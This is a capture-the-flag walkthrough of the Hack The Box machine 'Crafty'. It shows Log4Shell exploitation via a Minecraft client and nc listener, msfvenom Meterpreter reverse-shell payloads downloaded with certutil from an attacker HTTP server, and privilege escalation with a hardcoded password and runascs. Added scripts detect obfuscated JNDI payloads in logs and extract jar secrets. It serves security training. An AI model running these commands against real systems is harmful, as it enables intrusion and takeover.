Video version
All new content is published first on the channel t.me/kiberdruzhinnik. Subscribe so you don't miss it!
Service overview
Do I really need to spell out where the investigation starts?
$ rustscan --ulimit=5000 --range=1-65535 -a 10.129.225.128 -- -A -sC
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog :
: https://github.com/RustScan/RustScan :
--------------------------------------
Please contribute more quotes to our GitHub https://github.com/rustscan/rustscan
[~] The config file is expected to be at "/home/user/.rustscan.toml"
[~] Automatically increasing ulimit value to 5000.
Open 10.129.225.128:80
Open 10.129.225.128:25565
[~] Starting Script(s)
[>] Running script "nmap -vvv -p {{port}} {{ip}} -A -sC" on ip 10.129.225.128
Depending on the complexity of the script, results may take some time to appear.
[~] Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-02-10 14:04 EST
NSE: Loaded 156 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 14:04
Completed NSE at 14:04, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 14:04
Completed NSE at 14:04, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 14:04
Completed NSE at 14:04, 0.00s elapsed
Initiating Ping Scan at 14:04
Scanning 10.129.225.128 [2 ports]
Completed Ping Scan at 14:04, 0.14s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 14:04
Completed Parallel DNS resolution of 1 host. at 14:04, 0.00s elapsed
DNS resolution of 1 IPs took 0.00s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating Connect Scan at 14:04
Scanning 10.129.225.128 [2 ports]
Completed Connect Scan at 14:04, 2.45s elapsed (2 total ports)
Initiating Service scan at 14:04
NSE: Script scanning 10.129.225.128.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 14:04
Completed NSE at 14:04, 5.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 14:04
Completed NSE at 14:04, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 14:04
Completed NSE at 14:04, 0.00s elapsed
Nmap scan report for 10.129.225.128
Host is up, received syn-ack (0.15s latency).
Scanned at 2024-02-10 14:04:14 EST for 8s
PORT STATE SERVICE REASON VERSION
80/tcp filtered http no-response
25565/tcp filtered minecraft no-response
NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 14:04
Completed NSE at 14:04, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 14:04
Completed NSE at 14:04, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 14:04
Completed NSE at 14:04, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.95 seconds
Add crafty.htb to /etc/hosts right away. We'll also add the play.crafty.htb domain to /etc/hosts, though we won't need it.
Public RCE exploit
We'll use the exploit:
$ git clone https://github.com/kozmer/log4j-shell-poc
$ cd log4j-shell-poc
# replace /bin/sh with cmd.exe, since the target is a Windows machine
$ nano poc.py
$ wget https://repo.huaweicloud.com/java/jdk/8u181-b13/jdk-8u181-linux-x64.tar.gz
$ tar -zxf jdk-8u181-linux-x64.tar.gz
$ mv jdk1.8.0_181 jdk1.8.0_20
$ rlwrap nc -lnvp 4242
# in a separate window; this prints the payload
$ python3 poc.py --userip 10.10.14.86 --webport 4243 --lport 4242
# copy the payload and open one more window
$ git clone https://github.com/ammaraskar/pyCraft
$ cd pyCraft
$ python3 -m venv env
$ source env/bin/activate
$ pip install -r requirements.txt
$ python3 start.py
# username
> 1
# empty password
>
# server
> 10.129.225.128
# our payload
> ...
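The payload pasted into the chat above only works because the server's Log4j 2 expands `${...}` lookups in logged chat messages. As an added example (not code from the original writeup, nor from log4j-shell-poc or pyCraft), here is a small detector that a blue team could run over the server log: it first collapses the nested-lookup obfuscations Log4j would resolve itself (`${lower:...}`, `${upper:...}` and the `${x:-value}` default syntax), then looks for `${jndi:` and pulls out the scheme, host and port the victim would be made to connect to. The log lines and the chat-thread format are constructed for this example and are not a real capture.

```python
from __future__ import annotations
import re

# Innermost ${...} lookup: a body with no further "${" or "}" inside it.
_INNER_LOOKUP = re.compile(r"\$\{([^${}]*)\}")
# Final check after obfuscation is collapsed. Log4j 2 resolves lookup names
# case-insensitively, so "${jNdI:" is as dangerous as "${jndi:".
_JNDI = re.compile(r"\$\{\s*jndi\s*:\s*(\w+)://([^/}:\s]+)(?::(\d+))?", re.IGNORECASE)


def _resolve_inner(body: str) -> str | None:
    """Statically evaluate one innermost lookup the way Log4j 2 would.

    Handles the two building blocks of the common obfuscations:
      ${lower:J} / ${upper:j}    -> case-transformed argument
      ${env:NOPE:-j}, ${::-j}    -> the ':-' default value
    Returns None for lookups we must not touch (jndi itself, or unknown ones).
    """
    name = body.partition(":")[0].strip().lower()
    if name == "jndi":
        return None
    if ":-" in body:                      # default-value syntax, e.g. ${x:-j}
        return body.split(":-", 1)[1]
    if name in ("lower", "upper"):
        arg = body.partition(":")[2]
        return arg.lower() if name == "lower" else arg.upper()
    return None


def normalize(text: str, max_rounds: int = 32) -> str:
    """Collapse nested lookups inside-out until nothing else resolves."""
    for _ in range(max_rounds):
        changed = False

        def replace(m: re.Match) -> str:
            nonlocal changed
            resolved = _resolve_inner(m.group(1))
            if resolved is None:
                return m.group(0)
            changed = True
            return resolved

        text = _INNER_LOOKUP.sub(replace, text)
        if not changed:
            break
    return text


def extract_jndi_target(line: str) -> tuple[str, str, int | None] | None:
    """Return (scheme, host, port) of a JNDI lookup in the line, or None."""
    m = _JNDI.search(normalize(line))
    if not m:
        return None
    scheme, host, port = m.groups()
    return scheme.lower(), host, int(port) if port else None


def scan_log(lines) -> list[tuple[int, str, str, int | None]]:
    """Scan log lines; return (line_no, scheme, host, port) for every hit."""
    hits = []
    for no, line in enumerate(lines, 1):
        target = extract_jndi_target(line)
        if target:
            hits.append((no,) + target)
    return hits


# Constructed sample in the style of a Paper/Spigot server log; not a real capture.
SAMPLE_LOG = [
    "[14:05:12] [Server thread/INFO]: 1 joined the game",
    "[14:05:20] [Async Chat Thread - #0/INFO]: <1> ${jndi:ldap://10.10.14.86:1389/a}",
    "[14:06:01] [Async Chat Thread - #0/INFO]: <1> ${${lower:J}ndi:${lower:L}dap://10.10.14.86:1389/a}",
    "[14:06:30] [Async Chat Thread - #0/INFO]: <1> ${${::-j}${::-n}${::-d}${::-i}:${env:X:-rmi}://10.10.14.86:1389/a}",
    "[14:07:00] [Async Chat Thread - #0/INFO]: <1> my score is ${100}",
    "[14:07:10] [Server thread/INFO]: 1 lost connection: Disconnected",
]

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print("line %d: %s://%s:%s" % hit)
```

The normalizer is deliberately conservative: lookups it does not understand (`${date:...}`, `${100}`) are left in place rather than guessed, so the only way to produce a false negative is an obfuscation built from lookup types it does not model. Point `scan_log` at `logs/latest.log` of a real server to use it outside the example.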
User flag
Privilege escalation
In the server/plugins folder we find a server plugin.
C:\Users\svc_minecraft\server>cd plugins
C:\Users\svc_minecraft\server\plugins>dir
Volume in drive C has no label.
Volume Serial Number is C419-63F6
Directory of C:\Users\svc_minecraft\server\plugins
10/27/2023 01:48 PM <DIR> .
10/27/2023 01:48 PM <DIR> ..
10/27/2023 01:48 PM 9,996 playercounter-1.0-SNAPSHOT.jar
1 File(s) 9,996 bytes
2 Dir(s) 3,257,896,960 bytes free
Let's switch to Meterpreter.
$ msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=tun0 LPORT=4244 -f exe -o s.exe
$ msfconsole
use multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lhost tun0
set lport 4244
run
$ python3 -m http.server 4243
On the remote machine:
certutil -urlcache -f http://10.10.14.86:4243/s.exe %temp%/s.exe
start %temp%/s.exe
Download the playercounter-1.0-SNAPSHOT.jar file:
Using jd-gui, we find the RCON password used to manage the server:
RCON itself is disabled in the server settings, but the password also works for the administrator account.
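jd-gui is the convenient way to read the decompiled plugin, but the hardcoded password lives in the class file's constant pool, so it can also be pulled out without a decompiler. As an added example (not from the original writeup and not the plugin's own code), the script below walks every `.class` inside a jar, parses the constant pool per the JVM spec, collects the `CONSTANT_String` literals and flags the ones that look like credentials. The sample class and jar it builds for itself are constructed stand-ins with a made-up password, not the real playercounter-1.0-SNAPSHOT.jar; the "looks like a credential" filter is a heuristic and should be read as a triage aid, not a verdict.

```python
from __future__ import annotations
import io
import struct
import sys
import zipfile

# Payload sizes of fixed-width constant-pool entries (JVM spec §4.4), keyed by tag.
# CONSTANT_Utf8 (tag 1) is variable-length; Long (5) and Double (6) occupy two slots.
_FIXED = {3: 4, 4: 4, 5: 8, 6: 8, 7: 2, 8: 2, 9: 4, 10: 4, 11: 4,
          12: 4, 15: 3, 16: 2, 17: 4, 18: 4, 19: 2, 20: 2}


def class_string_constants(data: bytes) -> list[str]:
    """Return the string literals (CONSTANT_String -> CONSTANT_Utf8) of one .class file."""
    if data[:4] != b"\xca\xfe\xba\xbe":
        raise ValueError("not a class file")
    count = struct.unpack_from(">H", data, 8)[0]   # constant_pool_count
    pos, index = 10, 1
    utf8: dict[int, str] = {}
    string_refs: list[int] = []
    while index < count:
        tag = data[pos]
        pos += 1
        if tag == 1:
            length = struct.unpack_from(">H", data, pos)[0]
            pos += 2
            utf8[index] = data[pos:pos + length].decode("utf-8", errors="replace")
            pos += length
        elif tag == 8:
            string_refs.append(struct.unpack_from(">H", data, pos)[0])
            pos += 2
        elif tag in _FIXED:
            pos += _FIXED[tag]
        else:
            raise ValueError(f"unknown constant pool tag {tag} at offset {pos - 1}")
        index += 2 if tag in (5, 6) else 1
    return [utf8[i] for i in string_refs if i in utf8]


def looks_like_credential(s: str) -> bool:
    """Heuristic: an opaque token mixing letters and digits, with no spaces or path-like chars."""
    return (8 <= len(s) <= 64 and not any(c in s for c in " /.\\")
            and any(c.isalpha() for c in s) and any(c.isdigit() for c in s))


def find_candidate_secrets(jar: bytes | str) -> list[tuple[str, str]]:
    """Walk every .class in a jar (bytes or path) and return (class, literal) candidates."""
    src = io.BytesIO(jar) if isinstance(jar, bytes) else jar
    hits = []
    with zipfile.ZipFile(src) as z:
        for name in z.namelist():
            if name.endswith(".class"):
                for literal in class_string_constants(z.read(name)):
                    if looks_like_credential(literal):
                        hits.append((name, literal))
    return hits


def build_sample_class() -> bytes:
    """Constructed minimal class file standing in for a plugin class; not from the real jar."""
    def utf8(s: str) -> bytes:
        raw = s.encode()
        return b"\x01" + struct.pack(">H", len(raw)) + raw
    pool = (utf8("PlayerCounter")                        # 1
            + b"\x07" + struct.pack(">H", 1)             # 2   Class -> #1
            + utf8("127.0.0.1")                          # 3
            + b"\x08" + struct.pack(">H", 3)             # 4   String -> #3
            + utf8("s3cretP4ss")                         # 5   constructed password
            + b"\x08" + struct.pack(">H", 5)             # 6   String -> #5
            + b"\x05" + struct.pack(">Q", 25575)         # 7-8 Long (two slots)
            + utf8("Connecting to RCON")                 # 9
            + b"\x08" + struct.pack(">H", 9))            # 10  String -> #9
    header = b"\xca\xfe\xba\xbe" + struct.pack(">HHH", 0, 52, 11)  # minor, major, cp_count
    tail = struct.pack(">HHHHHHH", 0x0021, 2, 0, 0, 0, 0, 0)       # flags, this, super, empty tables
    return header + pool + tail


def build_sample_jar() -> bytes:
    """Constructed jar containing the sample class plus the usual plugin metadata."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("META-INF/MANIFEST.MF", "Manifest-Version: 1.0\n")
        z.writestr("plugin.yml", "name: playercounter\nmain: playercounter.PlayerCounter\n")
        z.writestr("playercounter/PlayerCounter.class", build_sample_class())
    return buf.getvalue()


if __name__ == "__main__":
    jar = sys.argv[1] if len(sys.argv) > 1 else build_sample_jar()
    for cls, literal in find_candidate_secrets(jar):
        print(f"{cls}: {literal!r}")
```

Run it with the path to a downloaded jar as the only argument; with no argument it runs against the constructed sample. Only `CONSTANT_String` entries are reported, which skips class names, method descriptors and other Utf8 noise that a plain `strings` on the jar would drown you in.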
Upload the compiled runascs.exe to the machine and get a shell.
Here we generate the payload and start the listener.
$ msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=tun0 LPORT=4246 -f exe -o s2.exe
$ msfconsole
use multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lhost tun0
set lport 4246
run
And here we execute our payload as the Administrator user.
runascs.exe "Administrator" "xxx" "C:\\users\\svc_minecraft\\server\\logs\\s2.exe"